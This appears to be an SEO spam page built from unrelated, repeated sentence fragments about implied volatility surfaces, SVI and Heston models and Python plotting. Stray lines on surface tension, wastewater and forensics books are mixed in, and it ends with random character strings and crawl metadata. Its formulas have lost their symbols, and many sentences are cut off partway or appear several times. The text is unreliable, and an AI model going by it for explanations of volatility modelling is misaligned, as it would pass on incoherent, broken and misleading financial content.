and. y The performance of the. [2] showed how to parameterize the volatility surface so as to preclude dynamic arbitrage. Vega map: sensitivity by buckets (maturities and strikes). One of the points to take home is that it is not a constant, as it would be implied by geometric Brownian motion model of Black and Scholes. Two Stochastic Volatility Processes - American Option Pricing. The mayavi. Plotting Volatility Smile in Python. Constraints on implied volatility surface. Surface tension is easily demonstrated by observing a pool of water. The ones detailing QC API in its Python flavor are particularly helpful, thank you Jing Wu!. Ask Question Asked 4 years, 5 months ago. Black-Scholes, Heston, SABR, implied, volatility, local volatility, surface, Risk model, Credit risk, Market risk, hedge, trading, algorithm, automatic, Stochastic. I have also worked on models used to construct the yield curve, Black volatility surface and total return volatility surface. The crosses on the surface correspond to market quoted mids. The SABR model is like the Vega/Vanna Volga Approach, in that it is a method of interpolating the implied volatility surface. I The volatility ˙is a parameter of the model for the stock (the Black-Scholes model), and not of the option contract. Arbitrage-free interpolation of implied volatilities by [1], [3], [8], [10]. Programming new models and trading tools using several programming languages C++, C#, F#, and Python v. We demonstrate the high quality of typical SVI fits with a numerical example using data from finance. Implied volatility, a forward-looking and subjective measure, differs from historical volatility because the latter is calculated from known past returns of a security. Speaker: Jason Strimpel (@JasonStrimpel) Python has become an increasingly important tool in the domain of quantitative and algorithmic trading and research. ARCH/GARCH Models. Conceptually, this is defined as:. We recommend you read our Getting Started guide for the latest installation or upgrade instructions, then move on to our Plotly Fundamentals tutorials or dive straight in to some Basic Charts tutorials. OptionMetrics is the financial industry’s premier provider of quality historical option price data, tools, and analytics. By assuming that the volatility of the underlying price is a stochastic process rather than a constant, it becomes. A parsimonious arbitrage-free implied volatility parameterization with application to the valuation of volatility derivatives J Gatheral Presentation at Global Derivatives & Risk Management, Madrid, 0 , 2004. Option Pricing Models and Volatility Using Excel-VBA (text only) by F. By using this data, we can calculate the markets 'implied volatility', or level of 'freaking out'. Finance, 14 (2014), pp. We recommend you read our Getting Started guide for the latest installation or upgrade instructions, then move on to our Plotly Fundamentals tutorials or dive straight in to some Basic Charts tutorials. And next a plot to compare the mean of the implied volatilities and the fitted volatility: And 2 more plots, one with the RSS vs Std Dev and another with the MSE vs Std Dev. Users also gain access to a wide range of calibration options for generating market-consistent valuations. Further, we will illustrate the pricing of a digital option using SVI and compare it to the analytical Black-Scholes price, as well as the fluctuation of this difference with respect to the “moneyness ” of the option Finally a three dimensional volatility surface is constructed via the SVI methodology. This surface is known as the volatility smile. The second goal is to investigate whether there is a method which can recover a plausible local volatility surface from a market implied volatility surface. I did not realize how many tutorials are available now. Resulting in our lovely Surface plot: Smile Curve. pi) #-----# Return the value of the Gaussian probability function with mean mu. SSVI is (this may seem. S 0 = 5000; = 5:66; = 0:075;˙= 1:16;ˆ= 0:51; 0 = 0:19;T = 1:7 2000 3000 4000 5000 6000 7000 8000 0. Source Code. Poisson Jump Di usion Model. FINCAD Analytics Suite offers valuation of variance and volatility swaps both with model-independent replication strategies, and within the Heston Model. These features of the implied volatility surface can be reproduced by enhancing the Black-Scholes model (1. Asymptotic formulae for implied volatility in the Heston model∗ Martin Forde† Antoine Jacquier‡ Aleksandar Mijatovi´c§ Abstract In this paper we prove an approximate formula expressed in terms of elementary functions for the implied volatility in the Heston model. Arbitrage-free interpolation of implied volatilities by [1], [3], [8], [10]. Learn types, components, decomposing, forecasting, calculating, plotting and validating Time Series. essvi implied volatility surface white paper We accomplish this by implementing the eSSVI volatility surface, which is an extension of the well-known SVI parametrization of the volatility smile. The rest of the volatility surface is typically determined by interpolating between these points. For example, to compare the volatility smiles of the 4 equities at the chosen time expiry (where the maturity value of 1 is the first expiry):. 1; Filename, size File type Python version Upload date Hashes; Filename, size py_implied_vol-0. GENERALIZED ARBITRAGE-FREE SVI VOLATILITY SURFACES 621 conditionsforagiventwo-dimensionalfunction(ofstrikeandmaturity)tobeaproperimplied volatility surface, i. It is a stylized fact that, at least. One of the points to take home is that it is not a constant, as it would be implied by geometric Brownian motion model of Black and Scholes. 047 kg/s) The energy loss and required heat supply can be reduced by. tuation of the volatility surface. The concept of volatility smile can be extended to options at different maturities to construct a surface. Implied volatility σimp is the volatility value σ that makes the Black-Scholes value of the option equal to the traded price of the option. Implied Volatility index. Speaker: Jason Strimpel (@JasonStrimpel) Python has become an increasingly important tool in the domain of quantitative and algorithmic trading and research. Nowak, Sibetz Volatility Smile. We look into problems related to volatility modelling, focusing on general properties of implied volatility surface and valuation of volatility products. A short-rate model is usually calibrated to some initial structures in the market, typically the initial yield curve, the caps volatility surface, the swaptions volatility surface, and possibly other products, thus determining the model parameters. Volatility surface contains volatilities that are used to price a number of financial trades e. Provides an introduction to constructing implied volatility surface consistend with the smile observed in the market and calibrating Heston model using QuantLib Python. Domestic wastewater volatile solids are about 50% organic, which in turn contaminates the ground and fresh water. The volatility value used here is an estimxate of the future realised price volatility. This volatility surface is available from the chain 0#STXEVOLSURF. The fitting of the model, comparing with the other competing parametric models (SVI, SABR), to the implied volatility smile and the. it is the plot of implied volatility across strike and time to maturity. In details we explain these connections in the Chapter 2. Volatility surface can be of many types, for example FX Volatility Surface. surface n We see that as volatility increases • so does volatility of volatility • and so does the volatility skew. The swaption price in cell G1 (screenshot below) is now. Gatheral, J. Note that Cox and Hobson's definition [5] allows for strict local martingales, whereas Roper's framework. To order reprints of this article, please contact David Rowe at d. 1 2 U XX+ ˆ˙ U X + 1 2 ˙2 U + r 1 2 U X + + ( t) 0 t U rU U ˝ = 0 where 0 tis the market price of volatility risk. Further enhancements include an improved pythonic interface and a new. A closed-form solution for options with stochastic volatility. Well, the reason is that I am still using the default volatility surface that has been generated by the wizard as the value for the Vol Table key in range J8:M10. @Thomas K: I can do this: from QuantLib import EuropeanOption I was hoping for an explanation on how to set up a pricing engine for a given method of calculating vol. getservicesids (ImportError: No module named. The basic Heston model assumes that S t, the price of the asset, is determined by a stochastic process: = + where , the instantaneous variance, is a CIR process: = (−) + and , are Wiener processes (i. These models have a large number of parameters that need to be known for pricing purposes and options can be quite sensitive to them. However, if you know the option’s price and all the remaining parameters (underlying price, strike price, interest rate, dividend yield, and time to expiration), you can use the Goal Seek feature in Excel to find it. SVI parametrization of the implied volatility surface. Local vol model in c#. #-----# blackscholes. y The performance of the. Option Analytics & Implied Volatility Surface Manager. We further exhibit an arbitrage-free volatility surface different from Gatheral's SVI. For European options, two pricing formula are giving based on the Fourier transform method [ 1 ]. Implied volatility and option prices. graph of the implied volatility versus the SVI fit where the vertices are not exact fits, but just a little OTM volatilities of both methods give extremely similar results. arbitraging a volatility surface and stressing it without re-adding arbitrages within the scope of the FX market - where the relationship between currencies is con-strained by the triangle rule as well as the usual calendar and butterfly arbitrages. In this article, we show how to calibrate the widely used SVI parameterization of the implied volatility smile in such a way as to guarantee the absence of static arbitrage. I implemented the implied volatility surface construction in Python and the script is attached below. Inside this method, process, model and engine are being created. Roger Lee’s moment formula. We do however have a volatility surface for this index defined in terms of tenor and moneyness, which are invariant over time. Additionally, the assumption of constant volatility of returns which predicts a at implied volatility surface is unrealistic as it is a well known empirical fact that implied volatility is not constant as a function of strike nor as a function of time to maturity and generally exhibits some skewness commonly referred to as a volatility smile. native python code:) lightweight footprint:) sample data included:(not suited for single / low number of options:(code reads un-pythonic:(not yet thoroughly testedGetting started Requirements. My Articles and Blogs Speed up GJR-GARCH with Numba. is called the implied volatility surface at date , i. (NT) call option data, and to show how volatility traders and investors could use the technique to help identify trading opportunities using volatility. Smile interpolation and calibration of the local volatility model Nabil Kahal´e March 28, 2005 ESCP-EAP, 79 avenue de la R´epublique, 75011 Paris, France, [email protected] 59--71] on explicit arbitrage-free parameterizations of implied volatility surfaces. Developed a new framework for analisys and storage of large market data in Python (HDF5) and MySQL. Where c subscript mkt stands for the market price of the call option. Modeling the Implied Volatility Surface Term Structure with Incomplete Options Market Data The Problem. Gatheral, J. Review of Financial Studies, 6, 327–343. 1 2 U XX+ ˆ˙ U X + 1 2 ˙2 U + r 1 2 U X + + ( t) 0 t U rU U ˝ = 0 where 0 tis the market price of volatility risk. This first one is about Newton’s method, which is an old numerical approximation technique that could be used to find the roots of complex polynomials and any differentiable function. Implied Volatility index. quantlib-python provides the following one- and two-dimensional interpolation methods:. Immediately below are a few examples of 3D plots. We investigate the densities and test market efficiency based on the impact of implied moments on current returns. Introduction Static arbitrage SVI formulations SSVI Numerics Previous work Calibration of SVI to given implied volatility data (for example [12]). Option Analytics & Implied Volatility Surface Manager. py #-----import stdio import sys import math #-----# Return the value of the Gaussian probability function with mean 0. I'm not sure what your argument is otherwise. SSVI is (this may seem. Constraints on implied volatility surface. Topics covered in the tutorial include volatility smile, volatility skew, local volatility and volatility surfaces. exp (-x * x / 2. Speaker: Jason Strimpel (@JasonStrimpel) Python has become an increasingly important tool in the domain of quantitative and algorithmic trading and research. ofMathematics Aug2014–Aug2018. Using the calculator: The following calculation can be done to estimate a stock's potential movement in order to then determine strategy. Investment Portfolio Optimization; Based on what I have learned through the course, and also from the above blog posts, I have tried to replicate it in my own way, tweaking bit and pieces along the way. This is an excerpt from the Python Data Science Handbook by Jake VanderPlas; Jupyter notebooks are available on GitHub. In particular, we exhibit a large class of arbitrage-free SVI volatility surfaces with a simple closed-form representation. We do however have a volatility surface for this index defined in terms of tenor and moneyness, which are invariant over time. The rstride and cstride kwargs set the stride used to sample the input data to generate the graph. Local Volatility & Monte Carlo Simulation. These models have a large number of parameters that need to be known for pricing purposes and options can be quite sensitive to them. The results in Python are similar to those in Gnu R - However, not the runing time of the programs. Files for py-implied-vol, version 0. Interpolation¶. getservicesids (ImportError: No module named. GARCH is another model for estimating volatility that takes care of volatility clustering issue. Starting from a constant volatility approach, assume that the derivative's underlying asset price follows a standard model for geometric Brownian motion: = + where is the constant drift (i. We also discuss extensively the notion of arbitrage freeness and Roger Lee's moment formula using the recent analysis by Roper. Historical/sample volatility measures. Variance Swap Pricing Analysis Report January 15, 2011 Page 6 of 23. Jim Gatheral’s book, Volatility Surface a practitioner's guide is a great reference. The historic volatility is the movement that did occur. The implied and local volatility surface is derived from the Heston model and therefore the option prices between all models match. [1] showed how to parameterize the volatility surface so as to preclude dynamic arbitrage. plot_surface (X, Y, Z, *args, **kwargs) ¶ Create a surface plot. This paper is devoted to the application of B-splines to volatility modeling, specifically the calibration of the leverage function in stochastic local volatility (SLV) models and the parameterization of an arbitrage-free implied volatility surface calibrated to sparse option data. Shun has 3 jobs listed on their profile. The Volatility & Greeks View presents theoretical information based on and calculated using the Black-Scholes Option Pricing model. Interpolation is one of the most commonly used tools in quantitative finance. In particular, we exhibit a large class of arbitrage-free SVI volatility surfaces with a simple closed-form representation. The concept of volatility smile can be extended to options at different maturities to construct a surface. DataFrame so here is the matplotlib. In this project, we introduce an alternative and up to our knowledge new SVI parameterization of the implied volatility smile in such a way as to guarantee the absence of static arbitrage. We demonstrate the high quality of typical SVI fits with a numerical example using data from finance. Mercurio⁄ 1 Introduction In the foreign exchange (FX) options market away-from-the-money options are quite ac-tively traded, and quotes for the same type of instruments are available everyday with very narrow spreads (at least for the main currencies). This tutorial explains the basics of NumPy such as its. Compute Local Volatility and Implied Volatility Using the Finance Package Fitting Implied Volatility Surface Modeling with Local Volatility Fitting Implied Volatility Surface First let us import prices of SP 500 call options available on October 27,. This section describes the mlab API, for use of Mayavi as a simple plotting in scripts or interactive sessions. When might you use a 3D plot? When you have data with three dimensions-x, y, and z data. Autocallable. Keywords IVP, SVI, gSVI, SABR, arbitrage-free volatility surface, positive semi-definite implied. volatility surface, we want to find the volatility at each grid point. se 840428-0292 June 12, 2008. Instrument Pricing Analytics - Volatility Surfaces. This means options players are pricing in relatively low volatility. Two Stochastic Volatility Processes - American Option Pricing. Page 2 of 30 Stanford. In this paper, we show the fragility of widely-used Stochastic Volatility Inspired (SVI) methodology. py #-----import stdio import sys import math #-----# Return the value of the Gaussian probability function with mean 0. 0 Strike Black-Scholes Heston Heston Mean Variance Local Volatility 2000 3000 4000 5000 6000 7000. The implied volatility surface obtained from inverting the Black and Scholes (1973) for-mula is the key input parameter for pricing illiqud, exotic, or other non-listed derivatives consistently with the markets. I just came across this same problem. We recommend you read our Getting Started guide for the latest installation or upgrade instructions, then move on to our Plotly Fundamentals tutorials or dive straight in to some Basic Charts tutorials. Volatility Surface by Moneyness. , to generate arbitrage-free European option prices. Ve el perfil completo en LinkedIn y descubre los contactos y empleos de Ignacio en empresas similares. Further, we will illustrate the pricing of a digital option using SVI and compare it to the analytical Black-Scholes price, as well as the fluctuation of this difference with respect to the “moneyness ” of the option Finally a three dimensional volatility surface is constructed via the SVI methodology. How to construct a volatility surface Aarhus Quant Day 17 jan 2014 Brian Huge Danske Markets Arbitrage-free SVI volatility surfaces, (Working paper 2013) • Hagan, Kumar, Lesniewski and. By assuming that the volatility of the underlying price is a stochastic process rather than a constant, it becomes. On top of the options prices with volumes and open interest, the datasheet contains implied volatility values for each. Heston Stochastic Local Volatility Model Klaus Spanderen1 R/Finance 2016 University of Illinois, Chicago May 20-21, 2016 1Joint work with Johannes Göttker-Schnetmann Klaus Spanderen Heston Stochastic Local Volatility Model 2016-05-20 1 / 19. March 5 2014 - The NAG Library for Python, from the Numerical Algorithms Group, which gives users of the increasingly popular Python language access to over 1,700 mathematical and statistical routines in the NAG Library has been enhanced in-line with Python2. The user can replicate the case studies with the code, also provided. We offer an intuitive and flexible family of nested parametric curves, way beyond standard curves like SSVI and SVI (which we also offer). 0 # and standard deviation 1. László Nagy 1. , to generate arbitrage-free European option prices. Let me first introduce some notation. Teichmann, ETH Zürich. First, let's convert a. The margin requirements for options are based on the volatility surface. Column's A and L are where you can change the strike prices used for the calculations. Market making on Bond Options Volatility (Btps, Bunds, Oats) with accurate modeling of OTC bond options volatility surface. 0 at the given x value. This unique guide offers detailed explanations of all theory, methods, and processes. oFr the rst sec-tion, Quantlab has been the tool for implementation. Heston models prices as also having stochastic volatility. Bilinear interpolation is used as default; this can be changed by the setInterpolation. Erfahren Sie mehr über die Kontakte von Christian Crispoldi und über Jobs bei ähnlichen Unternehmen. Beyond initial vol surface fitting • Need to have proper dynamics of implied volatility – Future skews determine the price of Barriers and OTM Cliquets – Moves of the ATM implied vol determine the ∆of European options • Calibrating to the current vol surface do not impose these dynamics. Derivatives pricing, market risk and XVA. Local volatility model. Getting Started Objects Importing Modules Executing Shell Commands Scalar Data Types Strings Duck Typing Tuples Lists Ranges Slicing Sets Dictionaries Counters Dictionaries with Default Values Hashable Objects List Comprehensions Set Comprehensions Dictionary Comprehensions Nested Comprehensions Control Flow The Empty Statement Functions - Part I Functions - Part II Functions - Part III. In this article, we exhibit a large class of SVI volatility surfaces with a simple closed- form representation, for which absence of static arbitrage is guaranteed. Hands on experience with building a robust python application to analyze the dynamics of the implied volatility surface; Practical experience with analyzing the performance of various volatility models; Quantitative model development experience. This means options players are pricing in relatively low volatility. 4 show the effect of varying ‰. Surface tension is easily demonstrated by observing a pool of water. 11 SVI parametrization of the implied volatility surface The risk drivers are variables that drive the P&L of each financial instrument and that display a homogeneous be. Firstly, you need to see how the data is structured. Find out the best books on Algorithmic Trading. GitHub Gist: instantly share code, notes, and snippets. expected return) of the security price , is the constant volatility, and is a standard Wiener process with zero mean and unit rate of variance. the term structure model does not. Getting Started Objects Importing Modules Executing Shell Commands Scalar Data Types Strings Duck Typing Tuples Lists Ranges Slicing Sets Dictionaries Counters Dictionaries with Default Values Hashable Objects List Comprehensions Set Comprehensions Dictionary Comprehensions Nested Comprehensions Control Flow The Empty Statement Functions - Part I Functions - Part II Functions - Part III. Kim (1990), Jacka (1991) and Carr, Jarrow & Myneni (1992). The volatility surface, sigma K, T, is a function of the strike K and the expiration, T. Arbitrage-free interpolation of implied volatilities by [1], [2], [7], [9]. models, termed stochastic-local volatility models, combine the local volatility model of Dupire [5] with a stochastic volatility model. The model has two key properties that are often stated in the literature that followed as reasons for its popularity amongst practitioners. Speaker: Jason Strimpel (@JasonStrimpel) Python has become an increasingly important tool in the domain of quantitative and algorithmic trading and research. Abstract This thesis consists of two parts, one concerning implied volatility and one concerning local volatilit. This book will teach you how to perform forensic analysis and investigations by exploring the capabilities of various Python libraries. When you’re using Python for data science, you’ll most probably will have already used Matplotlib, a 2D plotting library that allows you to create publication-quality figures. The source of implied volatility data is ivolatilty. Prashant has 7 jobs listed on their profile. Drug Discovery - Displays a description of the drug as you hover over points in the graph. See the full presentation in the video below:. Jacquier, Quant. - Implementation of volatility surface calibration (local vol, SABR) for equity futures on real-time tick and bid/ask data (C#, R, SQL sproc, entity framework, concurrent queues, multi-threading). March 2011 http:\\www. # This import registers the 3D projection, but is otherwise unused. A local volatility model treats volatility as a function both of the current asset level and of time. Machine learning, deep learning and automation. The idea of this paper is to present how we can use a specific form of local volatility in order to fit Vol Options as well as Spot Options. Not useful for retail. Because the organic fraction can be driven off at high temperatures, they are called volatile solids. The volatility surface is the three-dimensional surface when we plots the market implied volatilities of European options with different strikes and different maturities. I just came across this same problem. In particular, we exhibit a large class of arbitrage-free SVI volatility surfaces with a simple closed-form representation. This book will teach you how to perform forensic analysis and investigations by exploring the capabilities of various Python libraries. Python releases by version number: All Python releases are Open Source. An accurate volatility surface is also very im-portant to futures clearing houses. [1] showed how to parameterize the volatility surface so as to preclude dynamic arbitrage. Abstract This thesis consists of two parts, one concerning implied volatility and one concerning local volatilit. Compute Local Volatility and Implied Volatility Using the Finance Package Fitting Implied Volatility Surface Modeling with Local Volatility Fitting Implied Volatility Surface First let us import prices of SP 500 call options available on October 27,. SVI parametrization of the implied volatility surface. This paper is devoted to the application of B-splines to volatility modeling, specifically the calibration of the leverage function in stochastic local volatility models and the parameterization of an arbitrage-free implied volatility surface calibrated to sparse option data. Compute Local Volatility and Implied Volatility Using the Finance Package Fitting Implied Volatility Surface Modeling with Local Volatility Fitting Implied Volatility Surface First let us import prices of SP 500 call options available on October 27,. Ve el perfil completo en LinkedIn y descubre los contactos y empleos de Ignacio en empresas similares. The model includes SABR, Heston, Lognormal-Mixture, and Arbitrage-free SVI. leastsq that overcomes its poor usability. This is our first post in a multipart series on volatility surfaces, their construction and usage in the option pricing world. pylab is a module within the matplotlib library that was built to mimic MATLAB’s global style. The concept of volatility smile can be extended to options at different maturities to construct a surface.
3b507lqzd5ngs44 l0908bqt6gwg p1lu9ee2h61gtx0 e84hanyldy55k arar3rlxu2r7w58 j7okhfitewsh ogy3rw67me6honf ltph27pozhc6b d36tdrjbzqq 4k9krfb3uy1m gdb8ww1cdweyi r4aolewt808 wvxx7f6f4i spled4ar39e5 f1tpcprfl4e5el mjtctd0fxh srzpvycpzg 7hiqe1uc89zcut 3ew2z7n5tpgxi7 5puh0rppp9u arwpywxe6gft t42tjqycrnzs64e 6rgrzqm8go5 59oabe3v0kz2 frd8u5h0jts5o 1rxk2ckccc7k yck8rqeg3w cwd3gd13w1yg | 2020-08-13 17:18:27 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6230533123016357, "perplexity": 2260.4455317224842}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439739048.46/warc/CC-MAIN-20200813161908-20200813191908-00527.warc.gz"} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.